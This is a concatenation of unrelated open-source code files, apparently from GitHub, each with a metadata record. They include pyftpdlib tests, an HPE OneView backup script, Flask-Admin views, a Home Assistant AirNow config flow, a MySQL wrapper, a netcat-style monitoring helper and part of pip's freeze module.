self.assertRaises(ftplib.error_perm, self.client.rmd,
TESTFN_UNICODE)
def test_rnfr_rnto(self):
if self.utf8fs:
self.client.rename(TESTFN_UNICODE, TESTFN)
else:
self.assertRaises(ftplib.error_perm, self.client.rename,
TESTFN_UNICODE, TESTFN)
def test_size(self):
self.client.sendcmd('type i')
if self.utf8fs:
self.client.sendcmd('size ' + TESTFN_UNICODE_2)
else:
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'size ' + TESTFN_UNICODE_2)
def test_mdtm(self):
if self.utf8fs:
self.client.sendcmd('mdtm ' + TESTFN_UNICODE_2)
else:
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'mdtm ' + TESTFN_UNICODE_2)
def test_stou(self):
if self.utf8fs:
resp = self.client.sendcmd('stou ' + TESTFN_UNICODE)
self.assertTrue(TESTFN_UNICODE in resp)
else:
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'stou ' + TESTFN_UNICODE)
if hasattr(os, 'chmod'):
def test_site_chmod(self):
if self.utf8fs:
self.client.sendcmd('site chmod 777 ' + TESTFN_UNICODE)
else:
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'site chmod 777 ' + TESTFN_UNICODE)
# --- listing cmds
def _test_listing_cmds(self, cmd):
ls = []
self.client.retrlines(cmd, ls.append)
ls = '\n'.join(ls)
if self.utf8fs:
self.assertTrue(TESTFN_UNICODE in ls)
else:
# Part of the filename which are not encodable are supposed
# to have been replaced. The file should be something like
# 'tmp-pyftpdlib-unicode-????'. In any case it is not
# referenceable (e.g. DELE 'tmp-pyftpdlib-unicode-????'
# won't work).
self.assertTrue('tmp-pyftpdlib-unicode' in ls)
def test_list(self):
self._test_listing_cmds('list')
def test_nlst(self):
self._test_listing_cmds('nlst')
def test_mlsd(self):
self._test_listing_cmds('mlsd')
def test_mlst(self):
# utility function for extracting the line of interest
def mlstline(cmd):
return self.client.voidcmd(cmd).split('\n')[1]
if self.utf8fs:
self.assertTrue('type=dir' in
mlstline('mlst ' + TESTFN_UNICODE))
self.assertTrue('/' + TESTFN_UNICODE in
mlstline('mlst ' + TESTFN_UNICODE))
self.assertTrue('type=file' in
mlstline('mlst ' + TESTFN_UNICODE_2))
self.assertTrue('/' + TESTFN_UNICODE_2 in
mlstline('mlst ' + TESTFN_UNICODE_2))
else:
self.assertRaises(ftplib.error_perm,
mlstline, 'mlst ' + TESTFN_UNICODE)
# --- file transfer
def test_stor(self):
if self.utf8fs:
data = b'abcde12345' * 500
os.remove(TESTFN_UNICODE_2)
dummy = BytesIO()
dummy.write(data)
dummy.seek(0)
self.client.storbinary('stor ' + TESTFN_UNICODE_2, dummy)
dummy_recv = BytesIO()
self.client.retrbinary('retr ' + TESTFN_UNICODE_2,
dummy_recv.write)
dummy_recv.seek(0)
self.assertEqual(dummy_recv.read(), data)
else:
dummy = BytesIO()
self.assertRaises(ftplib.error_perm, self.client.storbinary,
'stor ' + TESTFN_UNICODE_2, dummy)
def test_retr(self):
if self.utf8fs:
data = b'abcd1234' * 500
with open(TESTFN_UNICODE_2, 'wb') as f:
f.write(data)
dummy = BytesIO()
self.client.retrbinary('retr ' + TESTFN_UNICODE_2, dummy.write)
dummy.seek(0)
self.assertEqual(dummy.read(), data)
else:
dummy = BytesIO()
self.assertRaises(ftplib.error_perm, self.client.retrbinary,
'retr ' + TESTFN_UNICODE_2, dummy.write)
class TestCommandLineParser(unittest.TestCase):
"""Test command line parser."""
SYSARGV = sys.argv
STDERR = sys.stderr
def setUp(self):
class DummyFTPServer(FTPServer):
"""An overridden version of FTPServer class which forces
serve_forever() to return immediately.
"""
def serve_forever(self, *args, **kwargs):
return
if PY3:
import io
self.devnull = io.StringIO()
else:
self.devnull = BytesIO()
sys.argv = self.SYSARGV[:]
sys.stderr = self.STDERR
self.original_ftpserver_class = FTPServer
pyftpdlib.__main__.FTPServer = DummyFTPServer
def tearDown(self):
self.devnull.close()
sys.argv = self.SYSARGV[:]
sys.stderr = self.STDERR
pyftpdlib.servers.FTPServer = self.original_ftpserver_class
safe_rmdir(TESTFN)
def test_a_option(self):
sys.argv += ["-i", "localhost", "-p", "0"]
pyftpdlib.__main__.main()
sys.argv = self.SYSARGV[:]
# no argument
sys.argv += ["-a"]
sys.stderr = self.devnull
self.assertRaises(SystemExit, pyftpdlib.__main__.main)
def test_p_option(self):
sys.argv += ["-p", "0"]
pyftpdlib.__main__.main()
# no argument
sys.argv = self.SYSARGV[:]
sys.argv += ["-p"]
sys.stderr = self.devnull
self.assertRaises(SystemExit, pyftpdlib.__main__.main)
# invalid argument
sys.argv += ["-p foo"]
self.assertRaises(SystemExit, pyftpdlib.__main__.main)
def test_w_option(self):
sys.argv += ["-w", "-p", "0"]
with warnings.catch_warnings():
warnings.filterwarnings("error")
self.assertRaises(RuntimeWarning, pyftpdlib.__main__.main)
# unexpected argument
sys.argv = self.SYSARGV[:]
sys.argv += ["-w foo"]
sys.stderr = self.devnull
self.assertRaises(SystemExit, pyftpdlib.__main__.main)
def test_d_option(self):
sys.argv += ["-d", TESTFN, "-p", "0"]
safe_mkdir(TESTFN)
pyftpdlib.__main__.main()
# without argument
sys.argv = self.SYSARGV[:]
sys.argv += ["-d"]
sys.stderr = self.devnull
self.assertRaises(SystemExit, pyftpdlib.__main__.main)
# no such directory
sys.argv = self.SYSARGV[:]
sys.argv += ["-d %s" % TESTFN]
safe_rmdir(TESTFN)
self.assertRaises(ValueError, pyftpdlib.__main__.main)
def test_r_option(self):
sys.argv += ["-r 60000-61000", "-p", "0"]
pyftpdlib.__main__.main()
# without arg
sys.argv = self.SYSARGV[:]
sys.argv += ["-r"]
sys.stderr = self.devnull
self.assertRaises(SystemExit, pyftpdlib.__main__.main)
# wrong arg
sys.argv = self.SYSARGV[:]
sys.argv += ["-r yyy-zzz"]
self.assertRaises(SystemExit, pyftpdlib.__main__.main)
def test_v_option(self):
sys.argv += ["-v"]
self.assertRaises(SystemExit, pyftpdlib.__main__.main)
# unexpected argument
sys.argv = self.SYSARGV[:]
sys.argv += ["-v foo"]
sys.stderr = self.devnull
self.assertRaises(SystemExit, pyftpdlib.__main__.main)
def test_V_option(self):
with mock.patch('pyftpdlib.__main__.config_logging') as fun:
sys.argv += ["-V"]
pyftpdlib.__main__.main()
fun.assert_called_once_with(level=logging.DEBUG)
# unexpected argument
sys.argv = self.SYSARGV[:]
sys.argv += ["-V foo"]
sys.stderr = self.devnull
self.assertRaises(SystemExit, pyftpdlib.__main__.main)
configure_logging()
remove_test_files()
if __name__ == '__main__':
unittest.main(verbosity=VERBOSITY)
|
{
"content_hash": "d61008b4fcafbaa0eaf30d9d7a674e63",
"timestamp": "",
"source": "github",
"line_count": 2833,
"max_line_length": 79,
"avg_line_length": 38.55771267207907,
"alnum_prop": 0.5840214585202409,
"repo_name": "aliyun/oss-ftp",
"id": "d46e0b5b4c8ca6a39c7e8ed43ee127364033e687",
"size": "109418",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "python27/unix/lib/pyftpdlib/test/test_functional.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "247"
},
{
"name": "C",
"bytes": "439021"
},
{
"name": "C#",
"bytes": "8440"
},
{
"name": "C++",
"bytes": "26115"
},
{
"name": "CSS",
"bytes": "84389"
},
{
"name": "F#",
"bytes": "2310"
},
{
"name": "Forth",
"bytes": "506"
},
{
"name": "GLSL",
"bytes": "1040"
},
{
"name": "HTML",
"bytes": "140138"
},
{
"name": "JavaScript",
"bytes": "5048"
},
{
"name": "Makefile",
"bytes": "895"
},
{
"name": "Mask",
"bytes": "969"
},
{
"name": "PLSQL",
"bytes": "22886"
},
{
"name": "Python",
"bytes": "24513573"
},
{
"name": "Roff",
"bytes": "21"
},
{
"name": "Shell",
"bytes": "7275"
},
{
"name": "Tcl",
"bytes": "2150885"
},
{
"name": "Visual Basic",
"bytes": "529"
}
],
"symlink_target": ""
}
|
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from builtins import range
from future import standard_library
standard_library.install_aliases()
import sys
PYTHON_VERSION = sys.version_info[:3]
PY2 = (PYTHON_VERSION[0] == 2)
if PY2:
if PYTHON_VERSION < (2, 7, 9):
raise Exception('Must use Python 2.7.9 or later')
elif PYTHON_VERSION < (3, 4):
raise Exception('Must use Python 3.4 or later')
import hpOneView as hpov
import os.path
from pprint import pprint
def acceptEULA(con):
# See if we need to accept the EULA before we try to log in
con.get_eula_status()
try:
if con.get_eula_status() is True:
print("EULA display needed")
con.set_eula('no')
except Exception as e:
print('EXCEPTION:')
print(e)
def login(con, credential):
# Login with givin credentials
try:
con.login(credential)
except:
print('Login failed')
def get_backup(sts):
print('Generating appliance backup')
backup = sts.generate_backup()
print('Downloading appliance backup')
sts.download_backup(backup)
def main():
parser = argparse.ArgumentParser(add_help=True,
formatter_class=argparse.RawTextHelpFormatter,
description='''
Generate a OneView Backup
Usage: ''')
parser.add_argument('-a', dest='host', required=True,
help='''
HPE OneView Appliance hostname or IP address''')
parser.add_argument('-u', dest='user', required=False,
default='Administrator',
help='''
HPE OneView Username''')
parser.add_argument('-p', dest='passwd', required=True,
help='''
HPE OneView Password''')
parser.add_argument('-c', dest='cert', required=False,
help='''
Trusted SSL Certificate Bundle in PEM (Base64 Encoded DER) Format''')
parser.add_argument('-y', dest='proxy', required=False,
help='''
Proxy (host:port format''')
parser.add_argument('-j', dest='domain', required=False,
default='Local',
help='''
HPE OneView Authorized Login Domain''')
args = parser.parse_args()
credential = {'authLoginDomain': args.domain.upper(), 'userName': args.user, 'password': args.passwd}
con = hpov.connection(args.host)
sts = hpov.settings(con)
if args.proxy:
con.set_proxy(args.proxy.split(':')[0], args.proxy.split(':')[1])
if args.cert:
con.set_trusted_ssl_bundle(args.cert)
login(con, credential)
acceptEULA(con)
get_backup(sts)
sys.exit()
if __name__ == '__main__':
import sys
import argparse
sys.exit(main())
# vim:set shiftwidth=4 tabstop=4 expandtab textwidth=79:
|
{
"content_hash": "ab7794ecfa227e6b323d9b76318f0688",
"timestamp": "",
"source": "github",
"line_count": 101,
"max_line_length": 105,
"avg_line_length": 29.08910891089109,
"alnum_prop": 0.6031313818924439,
"repo_name": "andreadean5/python-hpOneView",
"id": "aeb0d1650d48dd93b91734ade05d842186caf114",
"size": "4095",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "examples/scripts/get-backup.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "920844"
}
],
"symlink_target": ""
}
|
import os
from flask_admin import Admin, BaseView, form, expose, AdminIndexView
from flask_admin.contrib.sqla import ModelView
from flask_security import current_user
#from app.term_bp.forms import PrintForm
from app.extensions import db
from app.models import Category, Term, Rule, Document, Link
from app.config import BASE_DIR
# Create directory for file fields to use
FILE_PATH = os.path.join(BASE_DIR, 'app', 'static', 'files')
try:
os.mkdir(FILE_PATH)
except OSError:
pass
######################
## Admin views
######################
class MyHomeView(AdminIndexView):
'''Add a custom home view'''
@expose('/')
def index(self):
stats = {
'terms': Term.query.count(),
'rules': Rule.query.count(),
'documents': Document.query.count(),
'links': Link.query.count()
}
return self.render('admin/index.html', stats=stats)
class ProtectedModelView(ModelView):
'''Check user has logged in for each admin view'''
def is_accessible(self):
return current_user.has_role('admin')
class FileView(ProtectedModelView):
'''Override form field to use Flask-Admin FileUploadField'''
form_overrides = {
'path': form.FileUploadField
}
# Pass additional parameters to 'path' to FileUploadField constructor
form_args = {
'path': {
'label': 'File',
'base_path': FILE_PATH,
'allow_overwrite': False
}
}
class RuleView(ProtectedModelView):
'''Set the view options with displaying a Rule in the admin view'''
form_excluded_columns = ('created_on', 'updated_on')
column_list = ('identifier', 'name', 'description', 'notes')
#form_columns = ('identifier', 'name', 'description', 'notes', 'terms')
column_searchable_list = ['identifier', 'name', 'description']
column_default_sort = 'identifier'
form_widget_args = {
'notes': {
'rows': 10
},
'description': {
'rows': 5
}
}
class TermView(ProtectedModelView):
'''Set the view options with displaying a Term in the admin view'''
form_create_columns = ('name', 'short_description', 'long_description', 'abbreviation', 'owner',
'steward', 'status', 'categories', 'links', 'rules', 'documents')
form_edit_columns = ('name', 'short_description', 'long_description', 'abbreviation', 'owner',
'steward', 'status', 'categories', 'links', 'rules', 'related_terms',
'documents', 'columns')
column_list = ['name', 'short_description', 'abbreviation', 'status', ]
form_excluded_columns = ('created_on', 'updated_on')
column_searchable_list = ['name']
form_widget_args = {
'long_description': {
'rows': 5
}
}
class TableView(ProtectedModelView):
'''Set the view options with displaying a Table in the admin view'''
column_default_sort = 'name'
column_filters = ['location', 'name']
form_excluded_columns = ('columns')
class ColumnView(ProtectedModelView):
'''Set the view options with displaying a Column in the admin view'''
column_filters = ['table', 'name']
class PrintView(BaseView):
'''Add print option to admin menu'''
@expose('/')
def index(self):
blank_count = Term.query.filter_by(categories=None).count()
categories = Category.query.all()
return self.render('print/print_admin_menu.html', categories=categories, blank_count=blank_count)
|
{
"content_hash": "ebe29004bb4b175369d4b0321d121cf7",
"timestamp": "",
"source": "github",
"line_count": 111,
"max_line_length": 105,
"avg_line_length": 31.972972972972972,
"alnum_prop": 0.6151028458720766,
"repo_name": "atindale/business-glossary",
"id": "9d2b3702a8b88bee04ab8b6c92689bda96589b73",
"size": "4168",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/main/admin.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "13158"
},
{
"name": "HTML",
"bytes": "122645"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "158304"
}
],
"symlink_target": ""
}
|
"""
Copyright 2016, Michael DeHaan <michael.dehaan@gmail.com>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from camp.band.selectors.endlessly import Endlessly
from camp.band.selectors.repeatedly import Repeatedly
from camp.band.selectors.randomly import Randomly
class Patterns(object):
def __init__(self, song, patterns=None):
assert patterns is not None
self._factory = song
self._patterns = dict()
self._save(patterns)
def _save(self, patterns):
for (name, pattern) in patterns.items():
if isinstance(pattern, str):
pattern = pattern.replace("|","").split()
# print("USING PATTERN: %s" % pattern)
self._patterns[name] = self.create(pattern)
def create(self, pattern):
raise NotImplementedError()
def as_dict(self):
return self._patterns
class RandomPatterns(Patterns):
def __init__(self, song, mode=None, patterns=None):
self.mode = mode
super().__init__(song, patterns=patterns)
def create(self, pattern):
return Randomly(pattern, mode=self.mode)
class EndlessPatterns(Patterns):
def create(self, pattern):
return Endlessly(pattern)
class BasicPatterns(Patterns):
def create(self, pattern):
return pattern
class RepeatedPatterns(Patterns):
def __init__(self, song, hold=None, patterns=None):
self.hold = hold
self.mode = mode
super().__init__(song, patterns=patterns)
def create(self, pattern):
return Repeatedly(pattern, hold=self.hold)
|
{
"content_hash": "3bf179a6d11b773d589f1f6d8626673e",
"timestamp": "",
"source": "github",
"line_count": 72,
"max_line_length": 72,
"avg_line_length": 28.680555555555557,
"alnum_prop": 0.6779661016949152,
"repo_name": "mpdehaan/camp",
"id": "e6a1d067b7a30a5ef4c1339502ffcc30e5f44580",
"size": "2065",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "camp/tracker/patterns.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "224"
},
{
"name": "Python",
"bytes": "124099"
}
],
"symlink_target": ""
}
|
"""2014_托管通知接口"""
import clr, sys
from action import *
from lang import Lang
clr.AddReference('ZyGames.Framework.Game')
clr.AddReference('ZyGames.Doudizhu.Lang')
clr.AddReference('ZyGames.Doudizhu.Model')
clr.AddReference('ZyGames.Doudizhu.Bll')
from ZyGames.Framework.Game.Service import *
from ZyGames.Doudizhu.Lang import *
from ZyGames.Doudizhu.Model import *
from ZyGames.Doudizhu.Bll.Logic import *
class UrlParam(HttpParam):
def __init__(self):
HttpParam.__init__(self)
class ActionResult(DataResult):
def __init__(self):
DataResult.__init__(self)
self.UserId = 0
self.Status = 0
def getUrlElement(httpGet, parent):
urlParam = UrlParam()
if httpGet.Contains("Status"):
urlParam.Status = httpGet.GetByteValue("Status")
else:
urlParam.Result = False
return urlParam
def takeAction(urlParam, parent):
actionResult = ActionResult()
user = parent.Current.User
if not user:
parent.ErrorCode = Lang.getLang("ErrorCode")
parent.ErrorInfo = Lang.getLang("LoadError")
actionResult.Result = False
return actionResult
actionResult.UserId = user.UserId
actionResult.Status = urlParam.Status
return actionResult
def buildPacket(writer, urlParam, actionResult):
writer.PushIntoStack(actionResult.UserId)
writer.PushByteIntoStack(actionResult.Status)
return True
|
{
"content_hash": "c56b3a0c51e00c3929bd2652bb4e7a8f",
"timestamp": "",
"source": "github",
"line_count": 49,
"max_line_length": 56,
"avg_line_length": 29.571428571428573,
"alnum_prop": 0.6846100759144237,
"repo_name": "wenhulove333/ScutServer",
"id": "0de2699d7be96a66fbdf56c230e595938b5017be",
"size": "1463",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "Sample/Doudizhu/Server/release/PyScript/Action/Action2014.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "ASP",
"bytes": "150472"
},
{
"name": "ActionScript",
"bytes": "339184"
},
{
"name": "Batchfile",
"bytes": "60466"
},
{
"name": "C",
"bytes": "3976261"
},
{
"name": "C#",
"bytes": "9481083"
},
{
"name": "C++",
"bytes": "11640198"
},
{
"name": "CMake",
"bytes": "489"
},
{
"name": "CSS",
"bytes": "13478"
},
{
"name": "Groff",
"bytes": "16179"
},
{
"name": "HTML",
"bytes": "283997"
},
{
"name": "Inno Setup",
"bytes": "28931"
},
{
"name": "Java",
"bytes": "214263"
},
{
"name": "JavaScript",
"bytes": "2809"
},
{
"name": "Lua",
"bytes": "4667522"
},
{
"name": "Makefile",
"bytes": "166623"
},
{
"name": "Objective-C",
"bytes": "401654"
},
{
"name": "Objective-C++",
"bytes": "355347"
},
{
"name": "Python",
"bytes": "1633926"
},
{
"name": "Shell",
"bytes": "101770"
},
{
"name": "Visual Basic",
"bytes": "18764"
}
],
"symlink_target": ""
}
|
import socket
def netcat(hostname, port, content):
data = ""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((hostname, port))
s.sendall(content)
s.shutdown(socket.SHUT_WR)
while 1:
buff = s.recv(1024)
if buff == "":
break
else:
data += buff
s.close()
return data
|
{
"content_hash": "b3dddb2a2274860bf1d518c92fbf5e7b",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 57,
"avg_line_length": 22.625,
"alnum_prop": 0.5497237569060773,
"repo_name": "keedio/nagios-hadoop",
"id": "7f8d0f561b31569e15e0a276370852e80a283a3f",
"size": "1260",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "netcat.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "78099"
},
{
"name": "Shell",
"bytes": "8589"
}
],
"symlink_target": ""
}
|
import serial
import time
import json
#ser = serial.Serial("/dev/ttyS0", 9600)
ser = serial.Serial("/dev/ttyS0", 9600, timeout=0.2)
def main():
while True:
#Waiting for LoRa module message from uart port.
count = ser.inWaiting()
if count != 0:
recv = ser.readline() #readline() need to set timeout, otherwise results block
ser.flushInput()
print(recv)
json_lora = json.loads(recv)
#Parse JSON
#print(json_lora.get("ID"))
#print(json_lora["ID"])
#if json_lora.get("ID") == '1' : #Device ID-1 existed in gateway database
if int(json_lora.get("ID")) == 1 : #Device ID-1 existed in gateway database
if json_lora.get("CMD") == 'Online':
response = '{"ID":"1", "CMD":"Online", "TYPE":"Light2", "VALUE":"On"}'
print(response)
ser.write(response)
elif json_lora.get("CMD") == 'Env':
if json_lora.get("TYPE") == 'moisture':
if int(json_lora.get("VALUE")) < 2000: # soil moisture is lower than standard
response = '{"ID":"1", "CMD":"irrigate", "TYPE":"Open", "VALUE":"100"}'
ser.write(response)
else:
print('init_device')
#init_device() #Create sqlite table for device 1.
time.sleep(0.1)
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
if ser != None:
ser.close()
|
{
"content_hash": "dc7a430c62833e21d29c98ccc6267092",
"timestamp": "",
"source": "github",
"line_count": 39,
"max_line_length": 95,
"avg_line_length": 39.61538461538461,
"alnum_prop": 0.5106796116504855,
"repo_name": "Python-IoT/Smart-IoT-Planting-System",
"id": "36d04491476caf8aed0553c4c8fd5511d0acfbd5",
"size": "2298",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "gateway/src/main_bk.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "PLpgSQL",
"bytes": "563"
},
{
"name": "Python",
"bytes": "56858"
},
{
"name": "Shell",
"bytes": "2897"
}
],
"symlink_target": ""
}
|
import logging
import pymysql
LOG = logging.getLogger(__name__)
class _ConnectionWrapper(object):
def __init__(self, database_settings):
self._settings = database_settings
try:
self._conn = pymysql.connect(
host=database_settings.host,
port=database_settings.port,
user=database_settings.username,
password=database_settings.password,
db=database_settings.database,
cursorclass=pymysql.cursors.DictCursor,
use_unicode=True)
except pymysql.MySQLError as ex:
LOG.error('Failed to connect to connect to MySQL database '
'%s:%d/%s using login "%s" and password "%s": %s',
database_settings.host, database_settings.port,
database_settings.database, database_settings.username,
database_settings.password, ex)
raise
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if (exc_type, exc_val, exc_tb) == (None, None, None):
self._conn.commit()
self._conn.close()
def execute(self, sql, **kwargs):
"""
Execute SQL statement without returning result.
"""
LOG.debug('SQL execute [%s@%s:%d/%s]: %s %r',
self._settings.username, self._settings.host,
self._settings.port, self._settings.database, sql, kwargs)
with self._conn.cursor() as cursor:
cursor.execute(sql, kwargs)
def query(self, sql, **kwargs):
"""
Execute SQL sql query and return all rows. Any values in SQL query
of %(name)s format will be replaced by values passed as kwargs.
"""
LOG.debug('SQL query [%s@%s:%d/%s]: %s %r',
self._settings.username, self._settings.host,
self._settings.port, self._settings.database, sql, kwargs)
with self._conn.cursor() as cursor:
cursor.execute(sql, kwargs)
return cursor.fetchall()
def query_one(self, sql, **kwargs):
"""
Execute SQL sql query and return one rows. Any values in SQL query
of %(name)s format will be replaced by values passed as kwargs.
It is error if query returns more than one row.
"""
LOG.debug('SQL query one [%s@%s:%d/%s]: %s %r',
self._settings.username, self._settings.host,
self._settings.port, self._settings.database, sql, kwargs)
with self._conn.cursor() as cursor:
rowcount = cursor.execute(sql, kwargs)
assert rowcount <= 1
return cursor.fetchone()
def connection(database_settings):
return _ConnectionWrapper(database_settings)
|
{
"content_hash": "651c989527f2905c921eba7e100bb8ac",
"timestamp": "",
"source": "github",
"line_count": 76,
"max_line_length": 77,
"avg_line_length": 37.30263157894737,
"alnum_prop": 0.5675485008818342,
"repo_name": "SVilgelm/CloudFerry",
"id": "2c9388ed6c4a202b6260e5a49fc272d7fb76f933",
"size": "3409",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cloudferry/lib/os/cloud_db.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "2615"
},
{
"name": "Python",
"bytes": "1718937"
},
{
"name": "Ruby",
"bytes": "2507"
},
{
"name": "Shell",
"bytes": "11910"
}
],
"symlink_target": ""
}
|
"""Config flow for AirNow integration."""
import logging
from pyairnow import WebServiceAPI
from pyairnow.errors import AirNowError, InvalidKeyError
import voluptuous as vol
from homeassistant import config_entries, core, exceptions
from homeassistant.const import CONF_API_KEY, CONF_LATITUDE, CONF_LONGITUDE, CONF_RADIUS
from homeassistant.helpers.aiohttp_client import async_get_clientsession
import homeassistant.helpers.config_validation as cv
from .const import DOMAIN
_LOGGER = logging.getLogger(__name__)
async def validate_input(hass: core.HomeAssistant, data):
"""
Validate the user input allows us to connect.
Data has the keys from DATA_SCHEMA with values provided by the user.
"""
session = async_get_clientsession(hass)
client = WebServiceAPI(data[CONF_API_KEY], session=session)
lat = data[CONF_LATITUDE]
lng = data[CONF_LONGITUDE]
distance = data[CONF_RADIUS]
# Check that the provided latitude/longitude provide a response
try:
test_data = await client.observations.latLong(lat, lng, distance=distance)
except InvalidKeyError as exc:
raise InvalidAuth from exc
except AirNowError as exc:
raise CannotConnect from exc
if not test_data:
raise InvalidLocation
# Validation Succeeded
return True
class ConfigFlow(config_entries.ConfigFlow, domain=DOMAIN):
"""Handle a config flow for AirNow."""
VERSION = 1
CONNECTION_CLASS = config_entries.CONN_CLASS_CLOUD_POLL
async def async_step_user(self, user_input=None):
"""Handle the initial step."""
errors = {}
if user_input is not None:
# Set a unique id based on latitude/longitude
await self.async_set_unique_id(
f"{user_input[CONF_LATITUDE]}-{user_input[CONF_LONGITUDE]}"
)
self._abort_if_unique_id_configured()
try:
# Validate inputs
await validate_input(self.hass, user_input)
except CannotConnect:
errors["base"] = "cannot_connect"
except InvalidAuth:
errors["base"] = "invalid_auth"
except InvalidLocation:
errors["base"] = "invalid_location"
except Exception: # pylint: disable=broad-except
_LOGGER.exception("Unexpected exception")
errors["base"] = "unknown"
else:
# Create Entry
return self.async_create_entry(
title=f"AirNow Sensor at {user_input[CONF_LATITUDE]}, {user_input[CONF_LONGITUDE]}",
data=user_input,
)
return self.async_show_form(
step_id="user",
data_schema=vol.Schema(
{
vol.Required(CONF_API_KEY): str,
vol.Optional(
CONF_LATITUDE, default=self.hass.config.latitude
): cv.latitude,
vol.Optional(
CONF_LONGITUDE, default=self.hass.config.longitude
): cv.longitude,
vol.Optional(CONF_RADIUS, default=150): int,
}
),
errors=errors,
)
class CannotConnect(exceptions.HomeAssistantError):
"""Error to indicate we cannot connect."""
class InvalidAuth(exceptions.HomeAssistantError):
"""Error to indicate there is invalid auth."""
class InvalidLocation(exceptions.HomeAssistantError):
"""Error to indicate the location is invalid."""
|
{
"content_hash": "b98adb00d8de707f0b54e23a6b54bf39",
"timestamp": "",
"source": "github",
"line_count": 110,
"max_line_length": 104,
"avg_line_length": 32.58181818181818,
"alnum_prop": 0.6124441964285714,
"repo_name": "adrienbrault/home-assistant",
"id": "b4de58808da3610bf5a0f206a4c16d59530bd70c",
"size": "3584",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "homeassistant/components/airnow/config_flow.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1795"
},
{
"name": "Python",
"bytes": "32021043"
},
{
"name": "Shell",
"bytes": "4900"
}
],
"symlink_target": ""
}
|
from django import forms
class CustomLockdownForm(forms.Form):
"""A form to test the behavior of using custom forms for authentication."""
answer = forms.IntegerField()
def clean_answer(self):
"""Clean the answer field, by checking its value."""
if self.cleaned_data['answer'] == 42:
return 42
raise forms.ValidationError('Wrong answer.')
|
{
"content_hash": "b5fdcdfaa3a74ce72b0c5d975c674a56",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 79,
"avg_line_length": 30.076923076923077,
"alnum_prop": 0.6572890025575447,
"repo_name": "Dunedan/django-lockdown",
"id": "885d8775bc0af5cee13cc8c71852ea06148a55b6",
"size": "391",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lockdown/tests/forms.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "537"
},
{
"name": "Python",
"bytes": "48322"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import
import collections
import logging
import os
import re
from pip._vendor import six
from pip._vendor.packaging.utils import canonicalize_name
from pip._vendor.pkg_resources import RequirementParseError
from pip._internal.exceptions import BadCommand, InstallationError
from pip._internal.req.constructors import (
install_req_from_editable,
install_req_from_line,
)
from pip._internal.req.req_file import COMMENT_RE
from pip._internal.utils.misc import (
dist_is_editable,
get_installed_distributions,
)
from pip._internal.utils.typing import MYPY_CHECK_RUNNING
if MYPY_CHECK_RUNNING:
from typing import (
Iterator, Optional, List, Container, Set, Dict, Tuple, Iterable, Union
)
from pip._internal.cache import WheelCache
from pip._vendor.pkg_resources import (
Distribution, Requirement
)
RequirementInfo = Tuple[Optional[Union[str, Requirement]], bool, List[str]]
logger = logging.getLogger(__name__)
def freeze(
requirement=None, # type: Optional[List[str]]
find_links=None, # type: Optional[List[str]]
local_only=None, # type: Optional[bool]
user_only=None, # type: Optional[bool]
paths=None, # type: Optional[List[str]]
skip_regex=None, # type: Optional[str]
isolated=False, # type: bool
wheel_cache=None, # type: Optional[WheelCache]
exclude_editable=False, # type: bool
skip=() # type: Container[str]
):
# type: (...) -> Iterator[str]
find_links = find_links or []
skip_match = None
if skip_regex:
skip_match = re.compile(skip_regex).search
for link in find_links:
yield '-f %s' % link
installations = {} # type: Dict[str, FrozenRequirement]
for dist in get_installed_distributions(local_only=local_only,
skip=(),
user_only=user_only,
paths=paths):
try:
req = FrozenRequirement.from_dist(dist)
except RequirementParseError as exc:
# We include dist rather than dist.project_name because the
# dist string includes more information, like the version and
# location. We also include the exception message to aid
# troubleshooting.
logger.warning(
'Could not generate requirement for distribution %r: %s',
dist, exc
)
continue
if exclude_editable and req.editable:
continue
installations[req.canonical_name] = req
if requirement:
# the options that don't get turned into an InstallRequirement
# should only be emitted once, even if the same option is in multiple
# requirements files, so we need to keep track of what has been emitted
# so that we don't emit it again if it's seen again
emitted_options = set() # type: Set[str]
# keep track of which files a requirement is in so that we can
# give an accurate warning if a requirement appears multiple times.
req_files = collections.defaultdict(list) # type: Dict[str, List[str]]
for req_file_path in requirement:
with open(req_file_path) as req_file:
for line in req_file:
if (not line.strip() or
line.strip().startswith('#') or
